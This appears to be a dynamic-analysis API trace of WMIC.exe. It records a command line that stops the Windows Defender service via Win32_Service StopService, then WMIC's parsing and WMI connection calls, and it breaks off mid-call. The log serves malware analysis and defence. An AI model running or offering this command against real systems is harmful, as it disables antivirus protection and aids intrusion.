[0292.662] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.663] free (_Block=0x342aca8) [0292.663] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0292.663] malloc (_Size=0xc) returned 0x342ab28 [0292.663] malloc (_Size=0xc) returned 0x342ad68 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] SysStringLen (param_1="TABLE") returned 0x5 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0292.663] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.663] SysStringLen (param_1="wmiclimofformat") returned 0xf [0292.663] malloc (_Size=0x18) returned 0x3422c80 [0292.663] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.663] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.663] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.664] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=19, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.664] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="textvaluelist.xsl") returned 0x0 [0292.664] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.664] malloc (_Size=0xc) returned 0x342aba0 [0292.664] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.664] free (_Block=0x342aba0) [0292.664] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0292.664] malloc (_Size=0xc) returned 0x342ac48 [0292.664] malloc (_Size=0xc) returned 0x342aba0 [0292.664] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.664] SysStringLen (param_1="TABLE") returned 0x5 [0292.664] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.664] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.665] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.665] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.665] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.665] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.665] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.665] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.665] malloc (_Size=0x18) returned 0x3422d60 [0292.665] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.665] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.665] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.665] IXMLDOMNodeList:get_item (in: This=0x38f9ca0, index=20, listItem=0x2d6f9c4 | out: listItem=0x2d6f9c4*=0x38f6b88) returned 0x0 [0292.665] IXMLDOMNode:get_text (in: This=0x38f6b88, text=0x2d6f9c8 | out: text=0x2d6f9c8*="textvaluelist.xsl") returned 0x0 [0292.665] IXMLDOMNode:get_attributes (in: This=0x38f6b88, attributeMap=0x2d6f9c0 | out: attributeMap=0x2d6f9c0*=0x38f9fa8) returned 0x0 [0292.665] malloc (_Size=0xc) returned 0x342ac60 [0292.665] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x38f9fa8, name="KEYWORD", namedItem=0x2d6f9bc | out: namedItem=0x2d6f9bc*=0x38f9ff8) returned 0x0 [0292.666] free (_Block=0x342ac60) [0292.666] IXMLDOMNode:get_nodeValue (in: This=0x38f9ff8, value=0x2d6f97c | out: value=0x2d6f97c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0292.666] malloc (_Size=0xc) returned 0x342acc0 [0292.666] malloc (_Size=0xc) returned 0x342ad20 [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] SysStringLen (param_1="TABLE") returned 0x5 [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0292.666] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0292.666] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0292.666] malloc (_Size=0x18) returned 0x3422ca0 [0292.666] IUnknown:Release (This=0x38f6b88) returned 0x0 [0292.666] IUnknown:Release (This=0x38f9fa8) returned 0x0 [0292.666] IUnknown:Release (This=0x38f9ff8) returned 0x0 [0292.667] IUnknown:Release (This=0x38f9ca0) returned 0x0 [0292.667] FreeThreadedDOMDocument:IUnknown:Release (This=0x38f6b48) returned 0x1 [0292.667] FreeThreadedDOMDocument:IUnknown:Release (This=0x38f45a8) returned 0x0 [0292.667] free (_Block=0x3429880) [0292.667] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice" [0292.667] malloc (_Size=0xe0) returned 0x342aee8 [0292.667] memcpy_s (in: _Destination=0x342aee8, _DestinationSize=0xde, _Source=0x3231b78, _SourceSize=0xd2 | out: _Destination=0x342aee8) returned 0x0 [0292.667] malloc (_Size=0xc) returned 0x342ade0 [0292.667] malloc (_Size=0xc) returned 0x342abb8 [0292.667] malloc (_Size=0xc) returned 0x342ac18 [0292.667] malloc (_Size=0xc) returned 0x342ac00 [0292.668] malloc (_Size=0x80) returned 0x342afd0 [0292.668] GetLocalTime (in: lpSystemTime=0x2d6f960 | out: lpSystemTime=0x2d6f960*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x3a, wMilliseconds=0x2c8)) [0292.668] _vsnwprintf (in: _Buffer=0x342afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2d6f940 | out: _Buffer="04-02-2020T08:28:58") returned 19 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] malloc (_Size=0x8e) returned 0x342b058 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] malloc (_Size=0x8e) returned 0x342b0f0 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] malloc (_Size=0xa) returned 0x342ac60 [0292.668] lstrlenW (lpString="path") returned 4 [0292.668] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0292.668] malloc (_Size=0xa) returned 0x342ac90 [0292.668] malloc (_Size=0x4) returned 0x3422ee8 [0292.668] free (_Block=0x0) [0292.668] free (_Block=0x342ac60) [0292.668] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.668] malloc (_Size=0x1c) returned 0x3429da8 [0292.668] lstrlenW (lpString="Win32_Service") returned 13 [0292.668] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0292.668] malloc (_Size=0x1c) returned 0x3420568 [0292.668] malloc (_Size=0x8) returned 0x3420590 [0292.669] memmove_s (in: _Destination=0x3420590, _DestinationSize=0x4, _Source=0x3422ee8, _SourceSize=0x4 | out: _Destination=0x3420590) returned 0x0 [0292.669] free (_Block=0x3422ee8) [0292.669] free (_Block=0x0) [0292.669] free (_Block=0x3429da8) [0292.669] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.669] malloc (_Size=0xc) returned 0x342ac60 [0292.669] lstrlenW (lpString="where") returned 5 [0292.669] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0292.669] malloc (_Size=0xc) returned 0x342ad38 [0292.669] malloc (_Size=0xc) returned 0x342aca8 [0292.669] memmove_s (in: _Destination=0x342aca8, _DestinationSize=0x8, _Source=0x3420590, _SourceSize=0x8 | out: _Destination=0x342aca8) returned 0x0 [0292.669] free (_Block=0x3420590) [0292.669] free (_Block=0x0) [0292.669] free (_Block=0x342ac60) [0292.669] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.669] malloc (_Size=0x38) returned 0x342b188 [0292.669] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0292.669] _wcsicmp (_String1="\"name like '%%WinDefend%%'\"", _String2="\"NULL\"") returned -20 [0292.669] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0292.669] lstrlenW (lpString="\"name like '%%WinDefend%%'\"") returned 27 [0292.669] malloc (_Size=0x38) returned 0x342b1c8 [0292.669] malloc (_Size=0x10) returned 0x342ac60 [0292.669] memmove_s (in: _Destination=0x342ac60, _DestinationSize=0xc, _Source=0x342aca8, _SourceSize=0xc | out: _Destination=0x342ac60) returned 0x0 [0292.669] free (_Block=0x342aca8) [0292.669] free (_Block=0x0) [0292.669] free (_Block=0x342b188) [0292.669] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.670] malloc (_Size=0xa) returned 0x342aca8 [0292.670] lstrlenW (lpString="call") returned 4 [0292.670] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0292.670] malloc (_Size=0xa) returned 0x342acd8 [0292.670] malloc (_Size=0x18) returned 0x3422cc0 [0292.670] memmove_s (in: _Destination=0x3422cc0, _DestinationSize=0x10, _Source=0x342ac60, _SourceSize=0x10 | out: _Destination=0x3422cc0) returned 0x0 [0292.670] free (_Block=0x342ac60) [0292.670] free (_Block=0x0) [0292.670] free (_Block=0x342aca8) [0292.670] lstrlenW (lpString=" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice") returned 70 [0292.670] malloc (_Size=0x18) returned 0x3422a20 [0292.670] lstrlenW (lpString="stopservice") returned 11 [0292.670] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0292.670] malloc (_Size=0x18) returned 0x3422ce0 [0292.670] free (_Block=0x0) [0292.670] free (_Block=0x3422a20) [0292.670] malloc (_Size=0x18) returned 0x3422d20 [0292.670] lstrlenW (lpString="QUIT") returned 4 [0292.670] lstrlenW (lpString="path") returned 4 [0292.670] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0292.670] lstrlenW (lpString="EXIT") returned 4 [0292.670] lstrlenW (lpString="path") returned 4 [0292.670] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0292.670] free (_Block=0x3422d20) [0292.670] WbemLocator:IUnknown:AddRef (This=0x3244818) returned 0x2 [0292.670] malloc (_Size=0x18) returned 0x3422d20 [0292.670] lstrlenW (lpString="/") returned 1 [0292.671] lstrlenW (lpString="path") returned 4 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0292.671] lstrlenW (lpString="-") returned 1 [0292.671] lstrlenW (lpString="path") returned 4 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0292.671] lstrlenW (lpString="CLASS") returned 5 [0292.671] lstrlenW (lpString="path") returned 4 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0292.671] lstrlenW (lpString="PATH") returned 4 [0292.671] lstrlenW (lpString="path") returned 4 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0292.671] lstrlenW (lpString="/") returned 1 [0292.671] lstrlenW (lpString="Win32_Service") returned 13 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0292.671] lstrlenW (lpString="-") returned 1 [0292.671] lstrlenW (lpString="Win32_Service") returned 13 [0292.671] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0292.671] lstrlenW (lpString="Win32_Service") returned 13 [0292.671] malloc (_Size=0x1c) returned 0x3429da8 [0292.671] lstrlenW (lpString="Win32_Service") returned 13 [0292.672] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x9cc006a1 | out: _String="Win32_Service", _Context=0x9cc006a1) returned="Win32_Service" [0292.672] lstrlenW (lpString="Win32_Service") returned 13 [0292.672] malloc (_Size=0x1c) returned 0x342b188 [0292.672] lstrlenW (lpString="Win32_Service") returned 13 [0292.672] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x9cc006a1 | out: _String=0x0, _Context=0x9cc006a1) returned 0x0 [0292.672] lstrlenW (lpString="") returned 0 [0292.672] lstrlenW (lpString="WHERE") returned 5 [0292.672] lstrlenW (lpString="where") returned 5 [0292.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0292.672] lstrlenW (lpString="/") returned 1 [0292.672] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0292.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%WinDefend%%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0292.672] lstrlenW (lpString="-") returned 1 [0292.672] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0292.672] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%WinDefend%%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0292.672] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0292.672] malloc (_Size=0x34) returned 0x342b208 [0292.672] lstrlenW (lpString="name like '%%WinDefend%%'") returned 25 [0292.672] lstrlenW (lpString="/") returned 1 [0292.672] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0292.673] lstrlenW (lpString="-") returned 1 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] malloc (_Size=0xa) returned 0x342ac60 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] lstrlenW (lpString="GET") returned 3 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0292.673] lstrlenW (lpString="LIST") returned 4 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0292.673] lstrlenW (lpString="SET") returned 3 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0292.673] lstrlenW (lpString="CREATE") returned 6 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0292.673] lstrlenW (lpString="CALL") returned 4 [0292.673] lstrlenW (lpString="call") returned 4 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0292.673] lstrlenW (lpString="/") returned 1 [0292.673] lstrlenW (lpString="stopservice") returned 11 [0292.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0292.673] lstrlenW (lpString="-") returned 1 [0292.673] lstrlenW (lpString="stopservice") returned 11 [0292.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0292.674] lstrlenW (lpString="stopservice") returned 11 [0292.674] malloc (_Size=0x18) returned 0x34229a0 [0292.674] lstrlenW (lpString="stopservice") returned 11 [0292.674] ??0CHString@@QAE@XZ () returned 0x2d6d824 [0292.674] GetCurrentThreadId () returned 0x11f4 [0292.674] GetCurrentThreadId () returned 0x11f4 [0292.674] ??0CHString@@QAE@XZ () returned 0x2d6d7ac [0292.674] malloc (_Size=0x4) returned 0x3422ee8 [0292.674] malloc (_Size=0xc) returned 0x342aca8 [0292.674] malloc (_Size=0xc) returned 0x342ae40 [0292.674] WbemLocator:IWbemLocator:ConnectServer (in: This=0x3244818, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x324ae58) returned 0x0 [0292.726] free (_Block=0x342ae40) [0292.726] CoSetProxyBlanket (pProxy=0x324ae58, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0292.726] free (_Block=0x3422ee8) [0292.726] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.726] free (_Block=0x342aca8) [0292.726] malloc (_Size=0xc) returned 0x342aca8 [0292.726] IWbemServices:GetObject (in: This=0x324ae58, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2d6d83c*=0x0, ppCallResult=0x0 | out: ppObject=0x2d6d83c*=0x32a03a8, ppCallResult=0x0) returned 0x0 [0292.822] free (_Block=0x342aca8) [0292.822] IWbemClassObject:BeginMethodEnumeration (This=0x32a03a8, lEnumFlags=0) returned 0x0 [0292.822] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="StartService", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x32a05a0) returned 0x0 [0292.822] lstrlenW (lpString="StartService") returned 12 [0292.823] lstrlenW (lpString="stopservice") returned 11 [0292.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0292.823] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.823] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="StopService", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x32a05a0) returned 0x0 [0292.823] lstrlenW (lpString="StopService") returned 11 [0292.823] lstrlenW (lpString="stopservice") returned 11 [0292.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0292.823] malloc (_Size=0x38) returned 0x342b9b8 [0292.823] ??0CHString@@QAE@XZ () returned 0x2d6d38c [0292.823] GetCurrentThreadId () returned 0x11f4 [0292.823] IWbemClassObject:GetNames (in: This=0x32a05a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x2d6d39c | out: pNames=0x2d6d39c*="\x01ƀ\x04") returned 0x0 [0292.824] SafeArrayGetLBound (in: psa=0x32a09e8, nDim=0x1, plLbound=0x2d6d388 | out: plLbound=0x2d6d388) returned 0x0 [0292.824] SafeArrayGetUBound (in: psa=0x32a09e8, nDim=0x1, plUbound=0x2d6d384 | out: plUbound=0x2d6d384) returned 0x0 [0292.824] SafeArrayGetElement (in: psa=0x32a09e8, rgIndices=0x2d6d390, pv=0x2d6d3a0 | out: pv=0x2d6d3a0) returned 0x0 [0292.824] malloc (_Size=0x24) returned 0x342b9f8 [0292.825] IWbemClassObject:GetPropertyQualifierSet (in: This=0x32a05a0, wszProperty="ReturnValue", ppQualSet=0x2d6d2b0 | out: ppQualSet=0x2d6d2b0*=0x324b138) returned 0x0 [0292.825] malloc (_Size=0xc) returned 0x342aca8 [0292.825] IWbemQualifierSet:Get (in: This=0x324b138, wszName="CIMTYPE", lFlags=0, pVal=0x2d6d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0292.825] free (_Block=0x342aca8) [0292.825] malloc (_Size=0xc) returned 0x342aca8 [0292.825] IWbemClassObject:Get (in: This=0x32a05a0, wszName="ReturnValue", lFlags=0, pVal=0x2d6d258*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2d6d294*=47633020, plFlavor=0x0 | out: pVal=0x2d6d258*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2d6d294*=19, plFlavor=0x0) returned 0x0 [0292.825] malloc (_Size=0xc) returned 0x342ae40 [0292.826] IWbemQualifierSet:Get (in: This=0x324b138, wszName="read", lFlags=0, pVal=0x2d6d298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0292.826] free (_Block=0x342ae40) [0292.826] malloc (_Size=0xc) returned 0x342aea0 [0292.826] IWbemQualifierSet:Get (in: This=0x324b138, wszName="write", lFlags=0, pVal=0x2d6d298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d298*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0292.826] free (_Block=0x342aea0) [0292.826] malloc (_Size=0xc) returned 0x342ae28 [0292.826] malloc (_Size=0xc) returned 0x342ae58 [0292.826] IWbemQualifierSet:Get (in: This=0x324b138, wszName="Description", lFlags=0, pVal=0x2d6d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0292.826] free (_Block=0x342ae58) [0292.826] malloc (_Size=0xc) returned 0x342aea0 [0292.826] lstrlenA (lpString="Not Available") returned 13 [0292.826] malloc (_Size=0x1c) returned 0x342ba28 [0292.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x342ba28, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0292.826] free (_Block=0x342ba28) [0292.826] IUnknown:Release (This=0x324b138) returned 0x0 [0292.827] malloc (_Size=0x24) returned 0x342ba28 [0292.827] malloc (_Size=0xc) returned 0x342ae40 [0292.827] malloc (_Size=0x24) returned 0x342ba58 [0292.827] malloc (_Size=0x38) returned 0x342ba88 [0292.827] malloc (_Size=0x24) returned 0x342bac8 [0292.827] free (_Block=0x342ba58) [0292.827] free (_Block=0x342ba28) [0292.827] free (_Block=0x342b9f8) [0292.827] free (_Block=0x342ae28) [0292.827] free (_Block=0x342aea0) [0292.827] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.827] IWbemClassObject:GetMethodQualifierSet (in: This=0x32a03a8, wszMethod="StopService", ppQualSet=0x2d6d7a4 | out: ppQualSet=0x2d6d7a4*=0x3273fb8) returned 0x0 [0292.829] malloc (_Size=0xc) returned 0x342ae28 [0292.829] IWbemQualifierSet:Get (in: This=0x3273fb8, wszName="Implemented", lFlags=0, pVal=0x2d6d78c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d78c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0292.829] free (_Block=0x342ae28) [0292.829] malloc (_Size=0xc) returned 0x342ae70 [0292.829] malloc (_Size=0xc) returned 0x342ae10 [0292.830] IWbemQualifierSet:Get (in: This=0x3273fb8, wszName="Description", lFlags=0, pVal=0x2d6d77c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2d6d77c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0292.830] free (_Block=0x342ae10) [0292.830] malloc (_Size=0xc) returned 0x342aea0 [0292.830] IUnknown:Release (This=0x3273fb8) returned 0x0 [0292.830] malloc (_Size=0x38) returned 0x342b9f8 [0292.831] malloc (_Size=0x38) returned 0x342ba38 [0292.831] malloc (_Size=0x24) returned 0x342baf8 [0292.831] malloc (_Size=0xc) returned 0x342ae10 [0292.831] malloc (_Size=0x38) returned 0x342bb28 [0292.831] malloc (_Size=0x38) returned 0x342bb68 [0292.831] malloc (_Size=0x24) returned 0x342bba8 [0292.831] malloc (_Size=0x28) returned 0x342bbd8 [0292.831] malloc (_Size=0x38) returned 0x342bc08 [0292.831] malloc (_Size=0x38) returned 0x342bc48 [0292.831] malloc (_Size=0x24) returned 0x342bc88 [0292.831] free (_Block=0x342bba8) [0292.831] free (_Block=0x342bb68) [0292.831] free (_Block=0x342bb28) [0292.831] free (_Block=0x342baf8) [0292.831] free (_Block=0x342ba38) [0292.831] free (_Block=0x342b9f8) [0292.831] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.831] free (_Block=0x342bac8) [0292.831] free (_Block=0x342ba88) [0292.831] free (_Block=0x342b9b8) [0292.831] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, 